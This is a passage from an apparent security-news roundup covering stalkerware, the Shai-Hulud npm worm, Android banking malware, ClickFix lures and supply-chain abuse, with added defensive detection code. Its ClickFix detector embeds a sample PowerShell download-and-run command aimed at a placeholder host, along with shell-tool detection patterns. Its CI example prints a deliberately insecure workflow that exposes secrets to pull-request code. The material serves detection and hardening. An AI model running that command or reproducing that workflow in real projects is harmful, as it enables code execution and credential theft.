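    com.example.mdm/.DeviceAdminReceiver:
      uid=10099
      policies:
        force-lock
`;

const PACKAGES = `package:com.securebank.protect  installer=null
package:com.example.mdm  installer=com.android.vending
package:com.google.android.marvin.talkback  installer=com.android.vending
package:com.example.notes  installer=com.android.vending
`;

// Assumed allowlist: accessibility services you expect to see on this device.
const EXPECTED_A11Y_PACKAGES = new Set(['com.google.android.marvin.talkback']);

function parseAccessibility(setting) {
  // The setting is a colon-separated list of "package/ServiceClass" components.
  return setting.split(':').map(s => s.trim()).filter(Boolean).map(c => c.split('/')[0]);
}

function parseDeviceAdmins(dump) {
  // Component lines look like "    com.pkg/.Receiver:" under "Enabled Device Admins".
  const admins = [];
  let inSection = false;
  for (const line of dump.split('\n')) {
    if (/^\s*Enabled Device Admins/.test(line)) { inSection = true; continue; }
    const m = inSection && line.match(/^\s+([a-zA-Z0-9_.]+)\/(\S+):\s*$/);
    if (m) admins.push(m[1]);
  }
  return admins;
}

function parseInstallers(list) {
  // "package:<name>  installer=<installer package or null>"
  const out = new Map();
  for (const line of list.split('\n')) {
    const m = line.match(/^package:(\S+)\s+installer=(\S+)/);
    if (m) out.set(m[1], m[2] === 'null' ? null : m[2]);
  }
  return out;
}

// Returns Map<package, reasons[]>; an empty map means nothing stood out.
function triage(a11ySetting, devicePolicyDump, packageList) {
  const installers = parseInstallers(packageList);
  const findings = new Map();
  const add = (pkg, reason) => {
    if (!findings.has(pkg)) findings.set(pkg, []);
    findings.get(pkg).push(reason);
  };
  for (const pkg of parseAccessibility(a11ySetting)) {
    if (!EXPECTED_A11Y_PACKAGES.has(pkg)) add(pkg, 'accessibility-service');
  }
  for (const pkg of parseDeviceAdmins(devicePolicyDump)) add(pkg, 'device-admin');
  // Third-party packages not installed by Google Play were sideloaded (or pushed via adb).
  for (const [pkg, reasons] of findings) {
    if (installers.has(pkg) && installers.get(pkg) !== 'com.android.vending') reasons.push('sideloaded');
  }
  return findings;
}

function triageSample() {
  return triage(A11Y_SETTING, DEVICE_POLICY, PACKAGES);
}
```

On the constructed input, `com.securebank.protect` is flagged for all three reasons (an enabled accessibility service, an active device admin, and a null installer), while the MDM client is listed only as a device admin and TalkBack is not reported at all. One caveat when acting on the result: `adb shell dpm remove-active-admin <component>` only works for apps that declare `android:testOnly`, which malware will not, so deactivation in practice goes through Settings > Security > Device admin apps and, failing that, the factory reset that step 4 mentions.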


After discovering suspicious activity, users should take additional security steps. First, change passwords and enable biometrics: Resetting passwords on a separate device and enabling biometric locks strengthens account and device security. Secondly, create a new email address: A private email account can help regain control of linked services without alerting a stalkerware operator.

Advanced, commercial spyware demands stronger precautions. Research-based recommendations include:

• Reboot the device daily to disrupt attacks that rely on non-persistent, memory-only exploits.

• Disable iMessage and FaceTime on iOS, or enable Lockdown Mode, as these services are frequent targets for exploitation.

• Use alternative browsers such as Firefox Focus or Tor Browser to reduce exposure from browser-based exploits.

• Use a trusted VPN and jailbreak detection tools to protect against network and system-level intrusion.

• Use a separate secure device like those running GrapheneOS for sensitive communication.

Reducing the risk of future infections requires consistent precautions:

• Maintain physical device security through PINs, patterns, or biometrics.

• Install system updates as soon as they are released.

• Run antivirus scans regularly.

• Avoid apps from unofficial sources.

• Enable built-in security scanners for new installations.

• Review app permissions routinely and remove intrusive apps.

• Be cautious of suspicious links.

• Avoid jailbreaking the device.

• Enable multi-factor authentication, keeping in mind that spyware may still capture some verification codes.



PostHog Details “Most Impactful” Security Breach as Shai-Hulud 2.0 npm Worm Spreads Through JavaScript SDKs

 

PostHog has described the Shai-Hulud 2.0 npm worm incident as “the largest and most impactful security incident” the company has ever faced, after attackers managed to push tainted versions of its JavaScript SDKs and attempted to automatically harvest developer credentials.

In a recently published postmortem, PostHog, one of the maintainers caught up in the Shai-Hulud 2.0 outbreak, revealed that multiple packages, including core libraries such as posthog-node, posthog-js, and posthog-react-native, were compromised. The malicious versions included a preinstall script that ran the moment the package was added to a project. This script executed TruffleHog to search for secrets, exported any discovered credentials to newly created public GitHub repositories, and then used the stolen npm tokens to publish additional malicious updates, allowing the worm to continue spreading.

Researchers at Wiz, who identified the resurgence of the Shai-Hulud campaign, reported that more than 25,000 developers had their credentials exposed within just three days. Beyond PostHog, the malware also infiltrated packages from Zapier, AsyncAPI, ENS Domains, and Postman — many of which receive thousands of downloads every week.

Unlike a standard trojan, Shai-Hulud 2.0 operates like a fully autonomous worm. Once a compromised package is installed, it can collect a wide range of sensitive data — from npm and GitHub tokens to cloud provider credentials (AWS, Azure, GCP), CI/CD secrets, environment variables, and other confidential information found on developer machines or build environments. PostHog has since revoked all affected tokens, removed the infected package versions, and rolled out “known-good” releases.

However, the postmortem also underscored a deeper systemic flaw: the breach wasn’t caused by a leaked secret, but by a misconfigured CI/CD workflow that allowed untrusted pull-request code to execute with overly broad privileges. A malicious pull request triggered an automated script that ran with full access to the project. Because the workflow did not restrict execution of code from the attacker’s branch, the intruder was able to extract a bot’s personal-access token with organization-wide write permissions and use it to inject malicious updates.

Using the stolen credentials, the attacker created a tampered lint workflow designed to siphon all GitHub secrets — including the npm publishing token. With that token in hand, they uploaded the weaponized SDKs to npm, turning the infection into a self-propagating dependency-chain worm.

PostHog says it is now moving to npm's trusted publishing model (OIDC-based, with no long-lived publish token stored in CI) for releases, tightening workflow review processes, and disabling install-script execution in CI/CD pipelines, among other security improvements.
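The misconfiguration the postmortem describes has a well-known shape in GitHub Actions, shown below as an added illustration rather than PostHog's actual workflow: a workflow that runs on `pull_request_target` (so it has the base repository's secrets) and checks out the contributor's head commit executes untrusted code with those secrets, and `npm ci` on top of that runs every dependency's install hooks. The second document applies the changes the article lists. The job and secret names are assumptions.

```yaml
# BEFORE (assumed shape of the flaw, not PostHog's real file):
# pull_request_target runs in the base repository's context, so secrets are
# available; checking out the contributor's head commit then runs their
# code with them, and `npm ci` also executes each dependency's install hooks.
name: lint
on: pull_request_target
permissions: write-all
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci
      - run: npm run lint
        env:
          BOT_TOKEN: ${{ secrets.BOT_TOKEN }}   # org-wide write token exposed to PR code

---
# AFTER: untrusted PR code runs with a read-only token and no repository
# secrets; dependency install hooks are disabled; publishing is a separate
# job on tagged releases that authenticates via OIDC (npm trusted
# publishing) instead of a stored npm token.
name: lint-and-release
on:
  pull_request:
  push:
    tags: ['v*']
permissions:
  contents: read
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts
      - run: npm run lint
  publish:
    if: startsWith(github.ref, 'refs/tags/v')
    needs: lint
    runs-on: ubuntu-latest
    permissions:
      contents: read
      id-token: write   # lets npm mint a short-lived publish credential
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts
      - run: npm publish --provenance
```

A `pull_request` workflow triggered from a fork receives a read-only `GITHUB_TOKEN` and no repository secrets, which is what makes the second version safe to run on untrusted code; `--ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) is what would have stopped the worm's preinstall hook from executing at all.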

If this sounds all too familiar, that’s because it reflects a broader pattern across the ecosystem: over-privileged bots, automated workflows running unchecked, and dependency updates happening faster than anyone can thoroughly validate. As the incident shows, sometimes that’s all a worm needs to thrive.

More Breaches, More Risks: Experts say Protect Your Data Now

 

As data breaches surge, experts warn consumers to guard personal information before it reaches the dark web.

With data breaches becoming almost routine, more consumers are being forced to confront the risks of having their personal information exposed online. 

A recent US News survey found that 44 percent of respondents had received notices for multiple breaches involving their personal data. For many people, it now feels like another familiar company announces a breach every few days. Once stolen, this information typically ends up on the dark web, where it becomes a valuable resource for hackers, scammers, and cybercriminals. Breaches are only one pathway for data to be leaked. 

Clicking phishing links, entering details in viral social media quizzes, or having a device compromised by malware can all provide criminals with access to personal information that later circulates on underground forums. 

Dr. Darren Williams, founder and CEO of data privacy and ransomware protection company BlackFog, says the presence of some personal data on the dark web does not mean consumers should surrender to the problem. According to him, there are steps that can reduce exposure and protect information that has not yet been compromised. 

Williams explains that criminals increasingly rely on AI to pull together stolen data into detailed information bundles called “fullz.” These files can include banking credentials, addresses, medical data, and Social Security numbers. Scammers use them to impersonate relatives, romantic partners, or trusted contacts in targeted fraud attempts. 

He notes that while highly individualized scams are less common, criminals tend to target groups of victims at scale using dark web data. To understand their level of exposure, experts recommend that consumers start by scanning the dark web for leaked credentials. 

Many password managers and personal data removal services now offer monitoring tools that track whether email addresses, usernames, or passwords have been posted online. Removing data once it appears on dark web marketplaces is extremely difficult, which is why privacy specialists advise minimizing personal information shared online. Williams says reducing digital footprints can make individuals less appealing to attackers. 

Personal data removal services can help scrub information from commercial data broker sites, which can number in the hundreds. Security specialists also emphasize the importance of preventing criminals from expanding access to personal devices or financial accounts. 

Recommended practices include enabling multi-factor authentication, using strong and unique passwords stored in a password manager, installing antivirus software, avoiding links from unknown senders, updating operating systems regularly, and using a VPN on public Wi-Fi. Identity theft protection platforms and credit monitoring services can offer an extra layer of defense and provide real-time alerts if suspicious activity occurs.

Banking Malware Can Hack Communications via Encrypted Apps


Sturnus hacks communication 

A new Android banking malware dubbed Sturnus can capture conversations in full from encrypted messaging apps such as Signal, WhatsApp, and Telegram, and can take complete control of the device.  

While still under development, the trojan is fully functional and has been built to target accounts at various financial institutions across Europe using "region-specific overlay templates."  

Attack tactic 

Sturnus uses a combination of plaintext, RSA-encrypted, and AES-encrypted communication with its command-and-control (C2) server, which makes it more sophisticated than most existing Android malware families.

Sturnus steals messages from secure messaging apps after the decryption step by recording the content from the device screen, according to research from online fraud prevention and threat intelligence firm ThreatFabric. The malware can also collect banking account details using HTML overlays and supports complete, real-time remote access through a VNC session.

Malware distribution 

The researchers have not determined how the malware is distributed, but they consider malvertising or direct messages to victims plausible approaches. Upon launch, the malware connects to the C2 server and registers the victim device through a key-exchange step. 

For commands and data exfiltration it uses an encrypted HTTPS connection; for real-time VNC operations and live monitoring it opens an AES-encrypted WebSocket channel. By abusing the device's accessibility services, Sturnus can read text on the screen, record the victim's inputs, view the UI structure, detect app launches, press buttons, scroll, inject text, and navigate the device. 

To gain full control of the device, Sturnus requests Android device administrator privileges, which let it monitor password changes and unlock attempts and lock the device remotely. The malware also tries to stop the user from revoking its privileges or uninstalling it. When the user opens WhatsApp, Telegram, or Signal, Sturnus uses these permissions to capture message content, typed text, contact names, and conversation history.

Hackers Use Fake Windows Update Screen to Trick Users Into Running Malware Commands

 

A new cyberattack is circulating online, disguising itself as a legitimate Windows update in an effort to deceive users into executing harmful commands that can lead to malware installation.

Daniel B., a cybersecurity researcher with the UK’s National Health Service, discovered the scheme while examining malicious activity online. According to his findings, the operation has been active for about a month on the domain groupewadesecurity[.]com. When users visit the site, their computer—or even their smartphone—may suddenly display what looks like a genuine Windows update blue screen. This screen urges them to complete several keyboard steps.

In reality, the update screen is entirely fraudulent. It’s delivered through the browser and relies on the Fullscreen API to cover the entire display, creating the illusion of a system-level update. The interface then instructs users to press the Windows key along with the R key, which opens the Run dialog box on Windows systems. Meanwhile, the website silently places malicious commands onto the user’s clipboard.

The next prompt tells the user to hit “CTRL + V” to paste—and then press Enter. Anyone who follows these steps unknowingly triggers a command instructing Windows to execute code hosted on the attacker-controlled domain.

This attack is a fresh spin on the ongoing “ClickFix” technique, which has been used for roughly a year to manipulate users into running commands that install malware. Previous ClickFix campaigns have appeared as fake CAPTCHA pages, counterfeit Chrome error messages, and bogus government portals. The method continues to evolve in pursuit of new ways to lure victims. As Daniel B. noted, “The more recent ClickFix campaigns like these fake Windows update pages are a powerful reminder that user vigilance and cybersecurity awareness training are just as critical as technical defenses.”

Thankfully, the attack is relatively simple to detect and avoid. No legitimate website or service will ever ask users to perform such system-level commands. Since the fake screen is just a browser tab in full-screen mode, closing the tab or window immediately stops the attack. Chrome also helps by prompting users to press “ESC” whenever the browser enters full-screen mode unexpectedly.
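The three ingredients the article describes, a fullscreen request, a clipboard write and on-page instructions to open the Run dialog and paste, are easy to check for in a fetched page before a user ever sees it. The scanner below is an added example, not something from the researcher's write-up; both HTML samples are constructed (the lure points at `example.invalid`), and the indicator list and verdict rule are my own heuristics, so expect to tune them against real traffic.

```javascript
// Added example: heuristic detection of a ClickFix-style lure in page HTML.
// Both pages below are constructed samples, not real captured content.

const FAKE_UPDATE_PAGE = `<!doctype html>
<html><body style="background:#0067c0;color:#fff;font-family:sans-serif">
<h1>Working on updates 32%</h1>
<p>To finish installing, press <b>Windows + R</b>, then <b>CTRL + V</b> and <b>Enter</b>.</p>
<script>
document.documentElement.requestFullscreen();
navigator.clipboard.writeText('powershell -w hidden -c "irm http://example.invalid/p | iex"');
</script></body></html>`;

const VIDEO_PAGE = `<!doctype html>
<html><body><video id="v" src="/clip.mp4"></video>
<script>document.getElementById('v').requestFullscreen();</script></body></html>`;

// Each indicator is [name, pattern]. Fullscreen alone is common on legitimate
// pages; clipboard seeding combined with Run-dialog or shell text is not.
const INDICATORS = [
  ['fullscreen-api',  /\b(webkit|moz|ms)?requestFullscreen\s*\(/i],
  ['clipboard-write', /navigator\.clipboard\.writeText\s*\(|execCommand\s*\(\s*['"]copy['"]\s*\)/i],
  ['run-dialog-text', /\bwin(dows)?(\s*key)?\s*\+\s*r\b/i],
  ['paste-text',      /\bctrl\s*\+\s*v\b/i],
  ['shell-command',   /\b(powershell|pwsh|mshta|cmd(\.exe)?\s*\/c|iex|irm|iwr|certutil|bitsadmin)\b/i],
];

function analyzeHtml(html) {
  const indicators = INDICATORS.filter(([, re]) => re.test(html)).map(([name]) => name);
  const hits = new Set(indicators);
  const verdict = hits.has('clipboard-write') && (hits.has('run-dialog-text') || hits.has('shell-command'))
    ? 'clickfix-lure'
    : 'benign';
  return { verdict, indicators };
}
```

Run this on a proxy or sandbox fetch of the landing page: `analyzeHtml(FAKE_UPDATE_PAGE)` returns `clickfix-lure` with all five indicators, while the video page returns `benign` with only `fullscreen-api`. On the endpoint side, the equivalent telemetry is a `powershell.exe` or `mshta.exe` process whose parent is `explorer.exe` shortly after a browser was in the foreground, which is what the Run dialog produces.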

Despite this, cybersecurity firms say ClickFix-related campaigns are rising sharply. Because the user is the one unknowingly triggering the malicious code, traditional antivirus tools often fail to catch the threat. As ESET warned in June, "The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors."

How to Block Ads Across Your Entire Home Network and Reduce Online Threats

 

In today’s hyper-connected world, ads have become nearly impossible to escape. From phones and laptops to smart TVs, every screen you own is constantly serving you promotional content. And while most ads are simply irritating, some can be genuinely harmful. A single malicious advertisement can expose your device to malware or ransomware — a nightmare for anyone who has experienced it firsthand.

Browser extensions like uBlock Origin can help, but they only work on specific devices and compatible browsers. Your TV, your secondary phone, or a browser without extension support won’t benefit from them. So the real question becomes: how do you block ads everywhere, all at once?

The answer is to block ads across your entire home network, so every device connected to your Wi-Fi automatically gains protection. Below are two effective ways to make that happen.

1. Switch to Ad-Blocking DNS on Your Router

For most people, this is the easiest and fastest solution. Home routers typically assign IP addresses and DNS settings through DHCP. By default, these DNS servers often come from your ISP — and they usually offer no security or privacy enhancements.

By changing the DNS settings in your router, you can route all traffic through ad-blocking DNS servers instead. Popular options include:

  • AdGuard DNS: Blocks ads, trackers and malicious domains. Family-safe filters (including adult-content restrictions) are also available.

  • NextDNS: Highly customizable, allowing advanced filtering and custom blocklists.

  • ControlD: Offers personalized DNS profiles with built-in ad blocking.

DNS addresses you can use:
NextDNS: 45.90.28.152 and 45.90.30.152
AdGuard DNS: 94.140.14.14 and 94.140.15.15
ControlD: 76.76.2.2 and 76.76.10.2

To apply this, log into your router (usually at 192.168.1.1 or 192.168.1.254), find the DNS section, and replace your existing DNS entries with the ones above. Ensure all devices are set to use DHCP, so they automatically pick up the new ad-blocking DNS settings. One caveat: some devices ignore the DNS servers DHCP hands out (smart TVs and streaming sticks often hardcode a public resolver), and browsers or Android's Private DNS setting may send queries over encrypted DNS to a different provider. Those bypass router-level filtering unless the router also blocks or redirects outbound DNS.

If you prefer configuring individual devices instead of your entire network, you can manually set these DNS servers on your phone, laptop, or tablet.
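Whether the filtering runs at a hosted resolver or on a Pi-hole or AdGuard Home box (the next section), the per-query decision is the same: parse a blocklist, match the queried name and its parent domains, and either forward the query or answer with a sinkhole address. The function below is an added example, not code from either project. It parses the two list formats you will meet, hosts-file lines (which Pi-hole's gravity lists use) and Adblock-style `||domain^` rules with `@@` allow rules (which AdGuard Home uses); modifiers, wildcards and regex rules of the full Adblock syntax are out of scope, and the list itself is constructed.

```javascript
// Added example: the sinkhole decision of a network-wide DNS filter, reduced
// to one function over a constructed blocklist.

const BLOCKLIST_TEXT = `# constructed sample list
0.0.0.0 ads.example.com
127.0.0.1 metrics.example.net   # hosts-style trailing comment
||tracker.example^
||example.org^
@@||static.example.org^
`;

function parseBlocklist(text) {
  const blocked = new Set();
  const allowed = new Set();
  for (const raw of text.split('\n')) {
    const line = raw.replace(/#.*$/, '').trim();
    if (!line) continue;
    let m;
    if ((m = line.match(/^@@\|\|([^^/$|]+)\^$/))) { allowed.add(m[1].toLowerCase()); continue; }
    if ((m = line.match(/^\|\|([^^/$|]+)\^$/))) { blocked.add(m[1].toLowerCase()); continue; }
    const [addr, ...names] = line.split(/\s+/);          // hosts-file format
    if (/^(0\.0\.0\.0|127\.0\.0\.1|::1?)$/.test(addr)) {
      for (const name of names) if (name !== 'localhost') blocked.add(name.toLowerCase());
    }
  }
  return { blocked, allowed };
}

// Test the query name and every parent domain: "a.b.c" -> a.b.c, b.c, c.
// A rule for "example.org" therefore covers "www.example.org" but not "notexample.org".
function matchesSuffix(set, qname) {
  const labels = qname.toLowerCase().replace(/\.$/, '').split('.');
  return labels.some((_, i) => set.has(labels.slice(i).join('.')));
}

function decide(list, qname) {
  if (matchesSuffix(list.allowed, qname)) return { action: 'forward' };
  if (matchesSuffix(list.blocked, qname)) return { action: 'sinkhole', answer: '0.0.0.0' };
  return { action: 'forward' };
}

const SAMPLE_LIST = parseBlocklist(BLOCKLIST_TEXT);
const decideSample = (qname) => decide(SAMPLE_LIST, qname).action;
```

Allow rules are checked first so that `@@||static.example.org^` can carve an exception out of the broader `||example.org^` block, which is how both tools let you unbreak a site's CDN without unblocking its tracker. Both also offer an NXDOMAIN response mode instead of a `0.0.0.0` answer; some apps retry harder on one than the other.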

2. Install a Dedicated Network-Wide Ad Blocker

If you want stronger filtering and more control, consider running a dedicated ad-blocking system using a spare computer or a Raspberry Pi. The two most trusted tools for this are Pi-hole and AdGuard Home.

Here’s a quick overview of installing AdGuard Home:

You can install it manually or in a container, but the manual method is beginner-friendly:

  1. Download the latest AdGuard Home release for your operating system from the official GitHub page.

  2. Extract the ZIP file.

  3. Windows users: Open a terminal as administrator, navigate to the folder using cd, and run:
    AdGuardHome.exe -s install

  4. Linux/macOS users: Navigate to the extracted directory and run:
    sudo ./AdGuardHome -s install

Once installed, open a browser on any device on your home network and go to the AdGuard Home setup page on SERVER (replace SERVER with the IP address of the device running the software). Follow the on-screen setup to finish configuration.

If you want instant results with minimal effort, start by switching your router to ad-blocking DNS. If you need deeper protection and detailed customization, a dedicated blocker like Pi-hole or AdGuard Home delivers far more power.

Either way, these methods can dramatically reduce ads across your home network — and make every device you own safer and cleaner to use.

New Android Malware Steals Debit Card Data And PINs To Enable ATM Withdrawals

 




Security researchers have identified an Android malware operation that can collect debit card details and PINs directly from a victim’s mobile device and use that information to withdraw cash from an ATM. What makes this attack particularly dangerous is that criminals never need to handle the victim’s physical bank card at any point. Instead, the entire theft is carried out through the victim’s compromised phone, wireless communication features, and a coordinated cashout attempt at an ATM.

The threat relies on a combination of social engineering and near field communication, a short-range wireless feature widely used for contactless payments on smartphones and payment cards. Once the malware is in place, it quietly monitors NFC activity on the compromised phone, captures the temporary transaction data, and sends this information to an accomplice positioned near an ATM. Because these NFC codes change quickly and are valid only for a short period, the cash withdrawal must be carried out almost immediately for the fraud to succeed.

The attackers cannot begin the operation until they convince the target to install the malicious application. To achieve this, they commonly send deceptive text messages or emails that pretend to come from a bank. These messages warn the user about false account issues or security concerns and direct them to install an app from a link. Victims are sometimes contacted through follow-up calls to reinforce the urgency and to make the request appear more legitimate. The app itself does not come from an official store and often asks for permissions it does not need, including access to financial inputs. Once a user enters their card information and PIN, the malware is ready to operate in the background.

When the victim completes a contactless transaction on their phone, the malware intercepts the NFC exchange and sends the captured data to the waiting accomplice. That person uses a phone or smartwatch to simulate the victim’s payment credential at a nearby ATM and withdraws money before the dynamic code becomes invalid. Because all steps are interconnected and time sensitive, the criminals typically coordinate their roles in advance.

This technique stands out because it exploits features designed for convenience. It does not rely on physical skimming devices or stolen cards. Instead, it abuses trusted communication processes inside the victim’s own device. The combination of fake alerts, misleading calls, unauthorized apps, and wireless data relays makes the attack appear legitimate to those who are not familiar with these tactics.


Practical steps readers should take:

• Only install banking or payment apps from official app stores or verified developer pages.

• Treat unsolicited messages or calls claiming to be from your bank as suspicious; verify alerts using the phone number printed on your card or official statements.

• Never share card numbers or PINs in response to unsolicited contacts.

• Review installed apps and revoke permissions for unknown or unnecessary apps, particularly those that request accessibility or payment access.

• Use reputable mobile security software and keep the device and apps updated; some security products can detect malicious installers and block phishing links. 



As cybercriminals continue to build more layered and coordinated attacks, staying informed about these methods is essential. Understanding how such schemes operate can help individuals protect themselves and warn others before they become victims.

Tens of Thousands of Self-Replicating npm Packages Tied to tea.xyz Token Farming

 

Security experts are becoming increasingly concerned about a developing anomaly in the JavaScript ecosystem after researchers discovered a massive cluster of self-replicating npm packages that seem to have no technical function but instead indicate a well-thought-out and financially motivated scheme. Over 43,000 of these packages—roughly 1% of the whole npm repository—were covertly uploaded over a two-year period using at least 11 synchronized accounts, according to recent research by Endor Labs. 

The libraries automatically reproduce themselves when downloaded and executed, filling the ecosystem with nearly identical code, even though they do not behave like traditional malware—showing no indicators of data theft, backdoor deployment, or system compromise. Investigators caution that even while these packages are harmless at the moment, their size and consistent behavior could serve as a channel for harmful updates in the future. 

With many packages containing tea.yaml files connected to TEA cryptocurrency accounts, early indications also point to a potential monetization plan, indicating the operation may be built to farm tokens at scale. The scope and complexity of the program were exposed by more research in the weeks that followed. 

In late October, Amazon's security researchers first observed clusters of unusual npm uploads using improved detection algorithms and AI-assisted monitoring. By November 7, hundreds of suspicious packages had been found, and by November 12 more than 150,000 packages had been linked to a network of coordinated developer accounts, well beyond the 43,000 that Endor Labs had counted. 

What had started out as a few dubious packages swiftly grew into a huge discovery. They were all connected to the tea.xyz token-farming initiative, a decentralized protocol that uses TEA tokens for staking, incentives, and governance to reward open-source contributions. Instead of using ransomware or credential stealers, the attackers flooded the registry with self-replicating packages that were made to automatically create and publish new versions.

As unwary developers downloaded or interacted with the contaminated libraries, the perpetrators silently accumulated token rewards. Each package's embedded tea.yaml file tied it to a blockchain wallet under the attackers' control, letting them divert rewards meant for legitimate contributors without drawing attention to themselves. The episode, according to security experts, highlights a broader structural flaw in contemporary software development, where the speed and openness of open-source ecosystems can be exploited at scale. 

Amazon's findings show how AI-driven automation lets attackers publish large volumes of junk or malicious packages in a short time, according to Manoj Nair, chief innovation officer at Snyk. He emphasized that manual review is no longer sufficient: developers should use behavior-based scanning and automated dependency-health controls to identify low-download libraries, template-reused content, and abrupt spikes in mass publishing before such components enter their build pipelines. 

In order to stop similar operations before they start, he continued, registry operators must also change by proactively spotting bulk uploads, duplicate code templates, and oddities in metadata. Suzu CEO Michael Bell shared these worries, claiming that the discovery of 150,000 self-replicating, token-farming npm packages shows why attackers frequently have significantly more leverage when they compromise the development supply chain than when they directly target production systems. 

Bell cautioned that companies need to treat build pipelines and dependency chains with the same rigor as production infrastructure because shift-left security is becoming the standard. This includes implementing automated scans, keeping accurate software bills of materials, enforcing lockfiles to pin trusted versions, and verifying package authenticity before installation. He pointed out that once malicious code enters production, defenders are already reacting to a breach rather than stopping an assault. 

The researchers found that the campaign took advantage of npm's install process by embedding executable scripts and circular dependency chains in package.json files. In practice, installing one package triggered a cascade that automatically pulled in several more, inflating both the replication rate and the packages' tea.xyz teaRank scores.

The operation created significant risks by flooding the registry with unnecessary entries, taxing storage and bandwidth resources, and increasing the possibility of dependency confusion, even if the packages did not include ransomware or credential-stealing payloads. Many of the packages shared cloned code, had tea.yaml files connecting them to attacker-controlled blockchain wallets, and used standard naming conventions. Amazon recommended that companies assess their current npm dependencies, eliminate subpar or non-functional components, and bolster their supply-chain defenses with separated CI/CD environments and SBOM enforcement. 
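The three traits the campaign combined, install-time scripts in package.json, a tea.yaml in the published tarball, and dependency cycles that make one install fan out into many, can all be checked offline from package metadata, and the first of them is also the Shai-Hulud 2.0 vector from the PostHog piece earlier on this page. The audit below is an added example, not tooling from Amazon, Endor Labs or npm: the mini-registry of manifests is constructed (names, versions and the `tarballFiles` lists are fictitious), and `tarballFiles` stands in for what `npm pack --dry-run <pkg>` would list.

```javascript
// Added example: audit a constructed set of package manifests for install
// hooks, tea.yaml manifests and dependency cycles. All package data is fictitious.

const REGISTRY = {
  'helper-core':  { scripts: { preinstall: 'node setup.js' }, dependencies: { 'helper-util': '^1.0.0' },
                    tarballFiles: ['package.json', 'setup.js', 'tea.yaml'] },
  'helper-util':  { dependencies: { 'helper-extra': '^1.0.0' }, tarballFiles: ['package.json', 'tea.yaml'] },
  'helper-extra': { dependencies: { 'helper-core': '^1.0.0' }, tarballFiles: ['package.json', 'tea.yaml'] },
  'tidy-strings': { scripts: { test: 'node test.js' }, dependencies: {}, tarballFiles: ['package.json', 'index.js'] },
};

// npm runs these for a dependency during install unless ignore-scripts is set.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

function installHooks(manifest) {
  return Object.keys(manifest.scripts || {}).filter(k => INSTALL_HOOKS.includes(k));
}

function hasTeaManifest(manifest) {
  return (manifest.tarballFiles || []).includes('tea.yaml');
}

// Depth-first walk over the dependency graph that records each cycle once,
// whichever package the walk entered it from.
function findCycles(registry) {
  const cycles = new Map();
  const visit = (name, path) => {
    const at = path.indexOf(name);
    if (at !== -1) {
      const cycle = path.slice(at);
      cycles.set([...cycle].sort().join('>'), cycle);   // key ignores rotation
      return;
    }
    if (!registry[name]) return;                          // dependency outside the sample
    for (const dep of Object.keys(registry[name].dependencies || {})) visit(dep, [...path, name]);
  };
  for (const name of Object.keys(registry)) visit(name, []);
  return [...cycles.values()];
}

// Returns { packageName: [flags...] }; an empty array means nothing stood out.
function audit(registry) {
  const inCycle = new Set(findCycles(registry).flat());
  const report = {};
  for (const [name, manifest] of Object.entries(registry)) {
    const flags = installHooks(manifest).map(h => `install-hook:${h}`);
    if (hasTeaManifest(manifest)) flags.push('tea.yaml');
    if (inCycle.has(name)) flags.push('dependency-cycle');
    report[name] = flags;
  }
  return report;
}
```

Against real packages, `npm view <pkg> scripts` gives the first input and `npm pack --dry-run <pkg>` the tarball listing; the cycle walk needs the dependency graph, which `npm view <pkg> dependencies` supplies one package at a time. Setting `ignore-scripts=true` in `.npmrc` defuses the first trait outright but not the other two, which is why the experts quoted above push for lockfiles and registry-side detection as well.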

The event adds to a growing list of software supply-chain risks that have prompted government organizations such as CISA to release new guidelines aimed at enhancing resilience throughout development pipelines. As the inquiry comes to an end, the campaign serves as a sobering reminder that supply-chain integrity can no longer be ignored. The scope of this issue demonstrates how readily automation, if left uncontrolled, can corrupt open-source ecosystems and exploit community trust for commercial gain.

Stronger verification procedures throughout development pipelines, ongoing dependency auditing, and stricter registry administration are all necessary, according to experts. In addition to reducing such risks, investing in clear information, resilient tooling, and cross-industry cooperation will support the long-term viability of the software ecosystems that contemporary businesses rely on.

Android Malware Hits 42 Million Downloads, Risking Mobile Payments

Android malware is surging globally, with attackers increasingly targeting mobile payments and IoT devices, exposing critical vulnerabilities in systems heavily relied upon for communication, work, and financial activity. 

Recent findings from Zscaler indicate that 239 malicious Android apps were discovered on Google Play, amassing a staggering 42 million downloads, mainly by users seeking productivity and workflow solutions trusted in hybrid work settings. This reflects a pronounced shift away from traditional card-based fraud toward abuse of mobile payment channels using various social engineering tactics—such as phishing, smishing, and SIM-swapping.

Mobile compromise incidents are escalating rapidly, highlighted by a 67% year-over-year spike in Android malware transactions. Spyware, banking trojans, and adware are the dominant threats, with adware constituting 69% of all malware detections, a sign of evolving monetization strategies among cybercriminals. The notorious 'Joker' family, meanwhile, has sharply declined to only 23% of activity. The report outlines a trend of attackers focusing on high-value sectors, with the energy industry experiencing a dramatic 387% increase in attack attempts compared to the previous year.

IoT environments remain highly vulnerable, particularly in manufacturing and transportation, which saw over 40% of IoT-related malware activity. IoT attacks are primarily driven by botnet malware families such as Mirai, Mozi, and Gafgyt—collectively responsible for about 75% of observed malicious payloads within this space. Routers, in particular, are heavily targeted, making up 75% of all IoT attacks, as attackers use them for botnet building and proxy networks.

Geographically, India is the prime target for mobile malware, receiving 26% of analyzed attacks, followed by the United States (15%) and Canada (14%). In IoT, the United States is most affected, seeing 54.1% of all malicious traffic. Certain threats like the Android Vo1d backdoor have infected at least 1.6 million Android TV boxes, mostly in India and Brazil, exposing the dangers linked to widespread use of inexpensive devices and outdated software. Malware families like Anatsa and Xnotice continue to refine their tactics for financial theft and regional targeting.

To defend against these threats, experts recommend maintaining regularly updated devices, using reputable antivirus apps, enabling ransomware protection, limiting unnecessary app installations, scrutinizing permissions, running frequent malware scans, and utilizing Google Play Protect. The article stresses the need for a "zero trust everywhere" approach combined with AI-driven threat detection to counter the evolving cyber landscape.